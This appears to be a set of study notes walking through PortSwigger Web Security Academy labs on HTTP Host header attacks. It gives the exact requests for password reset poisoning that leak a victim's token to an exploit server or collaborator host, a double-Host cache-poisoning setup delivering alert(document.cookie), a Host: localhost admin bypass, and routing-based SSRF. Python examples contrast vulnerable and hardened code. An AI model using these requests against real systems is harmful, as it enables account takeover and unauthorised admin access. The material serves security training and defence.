Web Security Notes
Portswigger / HTTP Host Header Attacks

labs

Lab - 1: Basic password reset poisoning (A)

  • This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account. You can log in to your own account using the following credentials: wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.

How does forgot password work in this lab?

  • First, test with own account wiener.

  • Entering the username on the forgot password page makes a POST request:

POST /forgot-password HTTP/1.1
Host: 0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net
...
csrf=TmWD6yKuj2ZaYbUZkL6sH3f6jom3mvU3&username=wiener

  • Then the page says "Please check your email for a reset password link."

  • In the email box, the following link with a token is received:

https://0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net/forgot-password?temp-forgot-password-token=WLiNjn9NG1CUePEojyt8OtuiaCr3clzi

Following the link returns the reset password page. Submitting it sends a POST request to change the password:

POST /forgot-password?temp-forgot-password-token=Hg1GwkdzYSEpDG5FDG5M3gNMULH0vGPS HTTP/1.1
Host: 0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net
...

csrf=9FlVx2UgbGDnst1PfLnKjyNdNp2h9wPi&temp-forgot-password-token=Hg1GwkdzYSEpDG5FDG5M3gNMULH0vGPS&new-password-1=peter&new-password-2=peter

How to exploit another user

  • Test the Host header of the POST request with other hosts:

POST /forgot-password HTTP/1.1
Host: www.test.com
...
csrf=TmWD6yKuj2ZaYbUZkL6sH3f6jom3mvU3&username=wiener

  • The email is still received, with the following link:

https://www.test.com/forgot-password?temp-forgot-password-token=hZ2261K8u025FraGlCRDl2Gs7RRFMjd0

  • Change the Host header to the exploit server and change the username to the other user:

POST /forgot-password HTTP/1.1
Host: exploit-0a47002904c32fb3c00831f6017b006e.web-security-academy.net/
...
csrf=SOcfxkHQ6D47ls6UbKS5xRvORlFvvlfm&username=carlos

  • Then look at the exploit server log; a GET request with the token is found.

  • Use that token to get the change password page for the other user:

https://0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net/forgot-password?temp-forgot-password-token=<token-from-log>

Lab - 2: Password reset poisoning via middleware (P)

  • This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account. You can log in to your own account using the following credentials: wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.

POST /forgot-password HTTP/1.1
X-Forwarded-Host: l5r2vxr3alvuvijrao2ocl83puvkj9.burpcollaborator.net
Host: 0a64005403af9d9ac08f879e001900f4.web-security-academy.net
...
username=carlos
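Both labs above boil down to the same defect: the application builds the reset link from a request header it does not control (Host in lab 1, X-Forwarded-Host injected through the middleware in lab 2). The following added example is not code from the notes or from the lab application; it contrasts a link builder that behaves like the labs with one that takes the origin only from configuration. The origin, the trusted-proxy set and the header dict shape are assumptions made for the illustration.

```python
from urllib.parse import urlencode

# Assumed configuration values (not from the notes): the origin is fixed at deploy
# time, and only the listed reverse proxy is allowed to set X-Forwarded-Host at all.
CANONICAL_ORIGIN = "https://app.example"
TRUSTED_PROXIES = {"10.0.0.5"}


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """Mirrors the lab behaviour: the host in the link comes from the request.

    `headers` is a dict with lower-cased header names. X-Forwarded-Host, when
    present, wins over Host (as the middleware in lab 2 does), so an attacker who
    can set either header decides where the victim's token is sent.
    """
    host = headers.get("x-forwarded-host") or headers["host"]
    query = urlencode({"temp-forgot-password-token": token})
    return f"https://{host}/forgot-password?{query}"


def reset_link_hardened(headers: dict, token: str, peer_ip: str) -> str:
    """Builds the link from CANONICAL_ORIGIN only.

    Request headers are inspected solely to reject suspicious traffic: an
    X-Forwarded-Host that did not come from a trusted proxy is a red flag worth
    logging and refusing. Even from a trusted proxy the value never reaches the URL.
    """
    if "x-forwarded-host" in headers and peer_ip not in TRUSTED_PROXIES:
        raise ValueError("X-Forwarded-Host received from an untrusted peer")
    query = urlencode({"temp-forgot-password-token": token})
    return f"{CANONICAL_ORIGIN}/forgot-password?{query}"


if __name__ == "__main__":
    # Constructed sample requests, modelled on the two labs.
    lab1 = {"host": "www.test.com"}
    lab2 = {"host": "app.example", "x-forwarded-host": "collab.example"}
    print(reset_link_vulnerable(lab1, "tok"))                 # points at www.test.com
    print(reset_link_vulnerable(lab2, "tok"))                 # points at collab.example
    print(reset_link_hardened(lab1, "tok", "203.0.113.9"))    # always app.example
```

The detection angle follows directly: any reset link whose host differs from the configured origin, or any request carrying X-Forwarded-Host from a non-proxy address, should never happen in a correctly wired deployment, so both are cheap alerts.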

Lab - 3: Password reset poisoning via dangling markup (E)

Plan: after XSS.


Lab - 4: Web cache poisoning via ambiguous requests

  • This lab is vulnerable to web cache poisoning due to discrepancies in how the cache and the back-end application handle ambiguous requests. An unsuspecting user regularly visits the site's home page. To solve the lab, poison the cache so the home page executes alert(document.cookie) in the victim's browser.

  • Add a second Host header with the exploit server and see where it is reflected.

  • In the exploit server, File path: /resources/js/tracking.js

  • In the exploit server, Body: alert(document.cookie)
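The poisoning works because the cache and the back end disagree about which of two Host headers counts. The added example below is not the lab's code; it simulates a front-end cache that keys on the first Host header in front of a back end that renders the script URL from the last one, then shows a front end that refuses ambiguous requests before anything can be cached. Hostnames and the raw requests are constructed for the illustration.

```python
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]

# Constructed requests. The second one carries two Host headers, as in the lab.
VICTIM_REQUEST = "GET / HTTP/1.1\r\nHost: shop.example\r\n\r\n"
POISON_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Host: exploit.example\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Headers:
    """Splits the header section of a raw HTTP/1.1 request into (name, value) pairs.
    Order and duplicates are preserved, which is exactly what the ambiguity hinges on."""
    head, _, _ = raw.partition("\r\n\r\n")
    pairs = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def hosts_in(headers: Headers) -> List[str]:
    return [v for n, v in headers if n == "host"]


def backend_render(headers: Headers) -> str:
    """Back end that resolves the absolute script URL from the *last* Host header."""
    host = hosts_in(headers)[-1]
    return f'<script src="https://{host}/resources/js/tracking.js"></script>'


class VulnerableFrontEnd:
    """Caches on the *first* Host header; never notices that the back end used another."""

    def __init__(self) -> None:
        self.cache: Dict[str, str] = {}

    def handle(self, raw: str) -> str:
        headers = parse_headers(raw)
        key = hosts_in(headers)[0] + "|GET /"
        if key not in self.cache:
            self.cache[key] = backend_render(headers)
        return self.cache[key]


class HardenedFrontEnd:
    """Rejects any request with zero or several Host headers before caching or forwarding,
    so the cache key and the back end can only ever see the same, single value."""

    def __init__(self) -> None:
        self.cache: Dict[str, str] = {}

    def handle(self, raw: str) -> str:
        headers = parse_headers(raw)
        hosts = hosts_in(headers)
        if len(hosts) != 1:
            return "400 Bad Request: ambiguous Host header"
        key = hosts[0] + "|GET /"
        if key not in self.cache:
            self.cache[key] = backend_render(headers)
        return self.cache[key]


def run_scenario(front_end) -> str:
    """Attacker request first, then the victim's normal request; returns what the victim gets."""
    front_end.handle(POISON_REQUEST)
    return front_end.handle(VICTIM_REQUEST)


if __name__ == "__main__":
    print(run_scenario(VulnerableFrontEnd()))   # script URL points at exploit.example
    print(run_scenario(HardenedFrontEnd()))     # script URL points at shop.example
```

Rejecting duplicates at the edge is the simplest fix; if the front end must stay lenient, it has to normalise the request (keep exactly one Host) before both computing the cache key and forwarding, so that the two components can never be fed different values.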


Lab - 5: Host header authentication bypass (A)

  • This lab makes an assumption about the privilege level of the user based on the HTTP Host header. To solve the lab, access the admin panel and delete Carlos's account.

  • The admin route can be found at /admin.

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost

Lab - 6: Routing-based SSRF (P)

  • This lab is vulnerable to routing-based SSRF via the Host header. You can exploit this to access an insecure intranet admin panel located on an internal IP address. To solve the lab, access the internal admin panel located in the 192.168.0.0/24 range, then delete Carlos.
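Labs 5 and 6 share one root cause: a component (the application in lab 5, the load balancer in lab 6) lets the Host header decide something it should not decide, namely privilege or the upstream address. The added example below is not code from the notes or from the lab; it sketches a front-end router that only forwards to an explicit hostname allowlist and answers 421 to everything else, next to a privilege check that reads the session rather than the Host header. The allowlist, upstream address and session layout are assumptions.

```python
import ipaddress
from typing import Dict, Optional, Tuple

# Assumed allowlist: public hostnames mapped to the upstream that serves them.
# Nothing else (localhost, bare IPs, internal names) is routable through this front end.
BACKENDS: Dict[str, str] = {"shop.example": "http://10.0.1.20:8080"}


def hostname_of(host_header: str) -> Optional[str]:
    """Extracts the host part of a Host header value; None if it is malformed.
    Handles `name`, `name:port`, `[v6]` and `[v6]:port`."""
    h = host_header.strip().lower()
    if not h:
        return None
    if h.startswith("["):                      # bracketed IPv6 literal
        end = h.find("]")
        return None if end == -1 else h[1:end]
    if h.count(":") == 1:                      # name:port
        return h.split(":", 1)[0]
    if ":" in h:                               # unbracketed IPv6 is not a valid Host
        return None
    return h


def route(host_header: str) -> Tuple[int, str]:
    """Front-end routing decision: (status, upstream or reason).
    Unknown hosts and IP literals get 421 Misdirected Request instead of being
    resolved, so Host can never steer the front end towards an internal address."""
    hostname = hostname_of(host_header)
    if hostname is None:
        return 400, "malformed Host header"
    try:
        ipaddress.ip_address(hostname)
        return 421, "IP literal Host rejected"
    except ValueError:
        pass                                   # not an IP literal, continue
    upstream = BACKENDS.get(hostname)
    if upstream is None:
        return 421, "Host not in allowlist"
    return 200, upstream


def is_admin_vulnerable(session: Dict[str, str], host_header: str) -> bool:
    """The lab-5 mistake: a request is treated as local (hence trusted) because of Host."""
    return hostname_of(host_header) == "localhost"


def is_admin_hardened(session: Dict[str, str], host_header: str) -> bool:
    """Privilege comes only from the authenticated session; Host is deliberately unused."""
    return session.get("role") == "admin"


if __name__ == "__main__":
    for value in ("shop.example", "shop.example:443", "localhost", "192.168.0.68", "[::1]:8080"):
        print(value, "->", route(value))
    anon = {"user": "wiener", "role": "user"}
    print(is_admin_vulnerable(anon, "localhost"), is_admin_hardened(anon, "localhost"))
```

On the detection side, a 421 from the front end is a useful signal: legitimate clients send the hostname they connected to, so a spike of requests for `localhost`, private IP ranges or unknown names against a public listener is worth alerting on.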


Last updated 2 years ago